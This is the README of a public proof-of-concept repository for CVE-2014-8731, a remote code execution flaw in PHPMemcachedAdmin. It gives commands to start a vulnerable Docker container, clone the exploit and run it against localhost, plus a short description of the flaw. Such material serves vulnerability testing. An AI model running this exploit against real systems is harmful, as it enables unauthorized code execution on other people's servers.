sbani / CVE-2014-8731-PoC

CVE-2014-8731 - PHPMemcachedAdmin RCE - Proof of Concept

CVE-2014-8731-PoC - PHPMemcachedAdmin Remote Code Execution

A proof-of-concept tool to test whether your own systems are vulnerable to CVE-2014-8731.

Blog Post

PHPMemcachedAdmin Remote Code Execution - CVE-2014-8731 PoC

Run test

Start victim server:

docker run -p8081:80 --rm --name phpma -it alphayax/phpmemcachedadmin

Attack victim with PoC:

git clone https://github.com/sbani/CVE-2014-8731-PoC.git
cd CVE-2014-8731-PoC
python attack.py http://localhost:8081 id

CVE details

PHPMemcachedAdmin 1.2.2 and earlier allows remote attackers to execute arbitrary PHP code via vectors related to "serialized data and the last part of the concatenated filename," which creates a file in webroot.

References:
